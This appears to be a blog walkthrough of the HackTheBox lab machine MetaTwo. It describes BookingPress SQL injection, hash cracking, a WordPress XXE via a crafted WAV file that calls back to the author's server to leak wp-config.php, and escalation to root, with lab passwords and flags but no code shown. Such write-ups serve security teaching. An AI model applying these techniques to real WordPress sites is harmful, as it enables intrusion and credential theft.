MetaTwo: A look at hacking WordPress, SQLi, XXE on HackTheBox
•
13 minutes
Cybersecurity
HackTheBox
PHP
SQL
Introduction
In the sprawling landscape of cybersecurity, we often encounter a variety of digital fortresses — each with their unique layers of protection. MetaTwo is one such system. In this post, we will take a look into how we approach the penetration testing (pen-testing) of such a system.
Reconnaissance: The Art of Information Gathering
In the realm of cybersecurity, reconnaissance plays a key role. It is the initial phase where we attempt to gather as much information about the target as possible, often employing tools like nmap.
Nmap Scan: Revealing the Open Ports
nmap is a free and open-source network scanner designed to discover hosts, services, and open ports to construct a “map” of the network. In our case, it helped identify the open ports on the MetaTwo system. Here’s the nmap command and the corresponding result:
Our nmap scan reveals that there are 3 open ports. The HTTP port (80/tcp), in particular, is interesting because when accessed through a web browser, it redirects to metapress.htb. Therefore, I added that to our hosts file:
Upon visiting the newly assigned URL, we are able to see the contents served over HTTP. The URL is: http://metapress.htb/.
A Deep Dive into WordPress Exploitation
Our reconnaissance revealed that we are dealing with a WordPress site. WordPress, being a popular content management system, is frequently a target of exploits due to its history of vulnerabilities and the susceptibility of its various plugins.
Analysis of the WordPress Site
I made a list of all the available pages by submitting an empty search. A careful inspection of these pages provided us with several potential avenues for investigation, such as possible vulnerable plugins or potential forms of payment systems.
http://metapress.htb/thank-you/ - appointment booking success page. Renders details of appointment (service, date/time, customer name) - maybe we can render something here if we get RCE?
A look into the source code and searching for generator revealed that the site was built on WordPress version 5.6.2, utilising the bookingpress v1.0.10 plugin and twentytwwentyone v1.1 theme. With these details, we were able to investigate known vulnerabilities:
Just above that line we can also see that it’s using the bookingpress v1.0.10 plugin for the appointment booking system.
And the theme is twentytwwentyone v1.1.
A critical SQL Injection vulnerability was found in the WordPress BookingPress Plugin v1.0.10, discovered and reported by cydave. The vulnerability could allow an attacker to interact directly with your database — stealing information or creating new administrator accounts. This issue was patched in version 1.0.11.
SQL Injection is a code injection technique that attackers can use to insert malicious SQL statements into input fields for execution by the underlying SQL database. In our case, this is precisely the vulnerability present in the BookingPress Plugin.
As instructed in the exploit lets grab the nonce from the events source code.
_wpnonce:'b0def982ab'b0def982ab
Next we use it in the following command to test if it works:
Looks like it works, we’ve managed to enumerate the database a bit.
Next we can try querying the users table by altering the SQLi request:
After successfully extracting the usernames, emails, and password hashes of two users, I attempted to crack the hashes. I achieved this by using John the Ripper, a popular password cracking tool.
Add hashes to a file:
Attempt crack:
Looks like we got a login!
manager : partylikearockstar
The result? We obtained the password for the ‘manager’ account: partylikearockstar. With these credentials, we can now attempt to log into the WordPress admin panel.
Exploiting WordPress Admin Privileges
WP Admin panel as manager
Armed with the newly obtained ‘manager’ credentials, I managed to gain access to the WordPress (WP) admin panel, revealing that this user has the ability to upload new media.
Identifying Vulnerabilities
It’s essential to point out that the WordPress version we’re dealing with is 5.6.2, which is known to be vulnerable to XML External Entity (XXE) exploitation (CVE-2021-29447). If you’re interested, you can read more about the vulnerability and the affected versions here.
WordPress versions 5.7, 5.6.2, 5.6.1, 5.6, 5.0.11 are affected to XML eXternal Entity vulnerability where an authenticated user with the ability to upload files in the Media Library can upload a malicious WAVE file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF).
Crafting an XXE Attack
To exploit this vulnerability, I decided to craft a malicious WAVE file that would call a HTTP server on our machine and pass it a malicious file containing Remote Code Execution (RCE) XML.
Our payload aimed to grab the wp-config.php file, which is crucial because it contains sensitive information such as database connection settings.
Craft the malicious WAV file:
Start our webserver:
After creating the malicious WAVE file and initiating our web server, we are ready to upload our WAV file.
This should trigger a response on our listening server:
Decoding the Response
The next part was decoding the response to obtain the PHP file. Once decoded, it provided us with some precious credentials for further exploitation.
The credentials obtained allow us to connect to an FTP server and rummage around its contents. I found a PHP file in the mailer folder which provided us with further credentials for an email server.
Let’s try and SSH into the server with these credentials.
SSH Access and User Flag
With the new credentials in hand, we are able to establish an SSH connection. However, this user does not have any root commands, necessitating further enumeration.
I first checked for the user flag and found it. However, the journey didn’t end there.
Unlocking PGP Keys and Cracking the Password
Upon further exploration, I discovered a hidden folder named .passpie in the user’s home. This folder contained a PGP pair of public and private keys. After extracting the private key and cracking the password with John the Ripper, I managed to obtain the password: blink182.
We put the private key in a file on our machine to try and crack it.
Convert it to a john the ripper format:
Then run john to crack it.
We get our password: blink182
Exporting Root Credentials and Root Flag
With this password, I exported the root credentials from passpie. We are able to confirm the root user’s password as p7qfAZt4_A1xo_0x.
Upon successful authentication as root, I found the final flag.
and we’ve got our final flag 5acf19dabe402006c6744912d180b243.
This blog post is part of a series on practical approaches to cybersecurity. Stay tuned for more updates and insights into the fascinating world of ethical hacking and cybersecurity best practices.
Stay safe, and happy hacking!
Note: This blog is for educational purposes only. Attempting unauthorised penetration testing is illegal and punishable by law. Always get explicit permission before performing any penetration testing.